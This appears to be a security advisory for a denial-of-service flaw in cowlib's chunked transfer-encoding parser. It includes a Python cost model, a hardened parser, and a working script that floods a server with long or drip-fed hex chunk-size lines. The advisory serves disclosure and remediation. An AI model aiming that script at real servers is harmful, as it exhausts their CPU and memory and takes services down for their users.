ninenines cowlib Uncontrolled Resource Consumption Vulnerability in Chunked Transfer-Encoding Parser
Vulnerability
A denial-of-service vulnerability has been identified in ninenines cowlib, in the cow_http_te module. The chunked transfer-encoding parser accepts an unbounded number of hex digits in the chunk-size field and folds each digit into an arbitrary-precision (bignum) integer, so every multiply-add costs time proportional to the digits already read: CPU time is quadratic in the length of the chunk-size field and memory is linear. When the input is drip-fed, the parser discards the accumulated length after each partial read and starts again from the first digit, raising the total cost to cubic. An unauthenticated remote attacker can trigger this by sending an HTTP/1.1 request with Transfer-Encoding: chunked whose chunk-size line is a long string of hex digits; the digits alone incur the cost, no chunk data has to follow. This issue affects cowlib versions from 0.6.0 up to, but not including, 2.16.1.
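The following is an added example, not cowlib's own code: a small Python model of a chunk-size parser that folds hex digits into an unbounded integer, a drip-feed loop that re-parses the line from its first byte after each partial read, and a bounded variant that rejects over-long chunk-size lines before doing any arithmetic. The function names, the digit cap of 16 and the work-unit accounting are this example's own assumptions; the page does not state what limit cowlib 2.16.1 enforces.

```python
"""Model of the chunk-size parsing cost described in the advisory.
Added example; not cowlib's cow_http_te implementation."""

HEX = b"0123456789abcdefABCDEF"

# Assumed cap: a 64-bit chunk length fits in 16 hex digits. The real
# limit chosen in cowlib 2.16.1 is not given on this page.
MAX_CHUNK_SIZE_DIGITS = 16


def parse_chunk_size(data):
    """Model of the vulnerable behaviour.

    Folds hex digits into a Python int (a bignum) until the CR that ends
    the chunk-size line; a ';' chunk extension is skipped. Returns
    (size, rest_after_line, work): size is None when the line is still
    incomplete. work counts the bits of the running total touched by each
    multiply-add, i.e. the bignum cost that grows with every digit read.
    """
    size, work, i, n = 0, 0, 0, len(data)
    while i < n and data[i] in HEX:
        work += size.bit_length()          # size * 16 + d costs O(bits of size)
        size = size * 16 + int(chr(data[i]), 16)
        i += 1
    if i == 0:
        raise ValueError("chunk size missing")
    while i < n and data[i] != 0x0D:       # skip any chunk extension up to CR
        i += 1
    if i + 1 >= n:
        return None, b"", work             # incomplete: caller waits for more bytes
    if data[i + 1] != 0x0A:
        raise ValueError("bad chunk-size line")
    return size, data[i + 2:], work


def drip_feed(fragments, parser):
    """Model of the reset the advisory describes: partial input is buffered
    and the chunk-size line is re-parsed from its first byte every time a
    new fragment arrives, so the quadratic cost is paid once per read."""
    buf, total = b"", 0
    for frag in fragments:
        buf += frag
        size, rest, work = parser(buf)
        total += work
        if size is not None:
            return size, rest, total
    return None, b"", total


def parse_chunk_size_bounded(data):
    """Hardened variant: count the hex run first and reject it as soon as it
    exceeds the cap, before any bignum arithmetic. A drip-fed attacker is
    cut off on the 17th digit, and each re-parse costs at most the cap."""
    digits = 0
    while digits < len(data) and data[digits] in HEX:
        digits += 1
        if digits > MAX_CHUNK_SIZE_DIGITS:
            raise ValueError("chunk-size line too long")
    return parse_chunk_size(data)


def attacker_cost(n_digits, drip):
    """Work units the server spends on an all-'f' chunk-size line of
    n_digits digits, delivered in one read or one byte per read."""
    line = b"f" * n_digits + b"\r\n"
    if not drip:
        return parse_chunk_size(line)[2]
    fragments = [bytes([b]) for b in line[:-2]] + [b"\r\n"]
    return drip_feed(fragments, parse_chunk_size)[2]


if __name__ == "__main__":
    # Doubling the digits quadruples the one-shot cost (quadratic) and
    # multiplies the drip-fed cost by roughly eight (cubic).
    for n in (300, 600, 1200):
        print(n, attacker_cost(n, drip=False), attacker_cost(n, drip=True))
    try:
        parse_chunk_size_bounded(b"f" * 17 + b"\r\n")
    except ValueError as e:
        print("bounded parser rejected:", e)
```

The work counter is an analytic stand-in for wall-clock time: with all-`f` digits the running total has 4*i bits after i digits, so a line of n digits costs 2n(n-1) units in one read, and drip-feeding one byte at a time sums that over every prefix. Measuring real elapsed time with the same inputs shows the same shape, only noisier.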
Impact
Exploitation of this vulnerability causes significant CPU exhaustion and memory amplification, leading to a denial-of-service condition.
Reproduction
The vulnerability can be reproduced by sending an HTTP/1.1 request with Transfer-Encoding: chunked whose chunk-size field is a long string of hex digits. Note that curl and Postman let you set the header but encode the body themselves and emit correct chunk-size lines, so they cannot put an arbitrary hex string in that field; a raw TCP client (netcat or a short script) that writes the request bytes directly is the practical route. To exercise the worse, cubic case, drip-feed the chunk-size digits a few bytes at a time: each partial read makes the parser discard its accumulated length and re-parse from the first digit.
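An added example, not part of the original advisory: a Python script that builds the request described above and writes it to a raw TCP socket, either in one piece or drip-fed a few bytes at a time. The host, port, path, digit count and the constructed request bytes are this example's own placeholders; point it only at a test instance you control.

```python
"""Build and send the chunked request described in the advisory.
Added example; host/port/path/digit count are placeholders."""
import socket
import time


def build_request(host, n_digits, path="/"):
    """Request line and headers, then the start of a chunked body whose
    chunk-size line is n_digits hex digits with no terminating CRLF. The
    server therefore keeps waiting for the end of the line and, per the
    advisory, keeps re-parsing the digits it already has."""
    head = (
        "POST {path} HTTP/1.1\r\n"
        "Host: {host}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
    ).format(path=path, host=host).encode("ascii")
    return head + b"f" * n_digits


def split_request(request, drip_bytes):
    """Headers as one fragment, then the chunk-size digits in pieces of
    drip_bytes, so each socket read hands the parser a partial line."""
    header_end = request.index(b"\r\n\r\n") + 4
    headers, body = request[:header_end], request[header_end:]
    pieces = [body[i:i + drip_bytes] for i in range(0, len(body), drip_bytes)]
    return [headers] + pieces


def send_request(host, port, n_digits, drip_bytes=0, delay=0.01, timeout=5.0):
    """Write the request to host:port. drip_bytes=0 sends it in one write;
    otherwise the digits go out drip_bytes at a time with a pause, which
    encourages (but cannot guarantee) separate reads on the server side.
    Returns whatever the server sends back within the timeout."""
    request = build_request(host, n_digits)
    fragments = [request] if drip_bytes <= 0 else split_request(request, drip_bytes)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        for frag in fragments:
            sock.sendall(frag)
            if drip_bytes > 0:
                time.sleep(delay)
        try:
            return sock.recv(4096)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    # Placeholders: a local test instance running the affected cowlib.
    TARGET_HOST, TARGET_PORT = "127.0.0.1", 8080
    t0 = time.monotonic()
    reply = send_request(TARGET_HOST, TARGET_PORT, n_digits=200000)
    print("one-shot: %.2fs, reply %r" % (time.monotonic() - t0, reply[:60]))
    t0 = time.monotonic()
    reply = send_request(TARGET_HOST, TARGET_PORT, n_digits=20000, drip_bytes=16)
    print("drip-fed: %.2fs, reply %r" % (time.monotonic() - t0, reply[:60]))
```

Watch the target's CPU and memory while the connection is open rather than relying on the reply: a patched server answers with a 4xx once the chunk-size line exceeds its limit, while an affected one simply keeps consuming. TCP segmentation and the server's read buffer decide how many bytes arrive per read, so the drip-fed variant is a best effort; a slower `delay` makes separate reads more likely.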
Remediation
Update to cowlib version 2.16.1 or later, where this vulnerability has been fixed. For applications using Cowboy that cannot upgrade immediately, lowering initial_stream_flow_size reduces the amount of chunked data handed to the parser in a single read and so limits the damage of a single request; it is a mitigation, not a fix, since the per-digit cost remains.
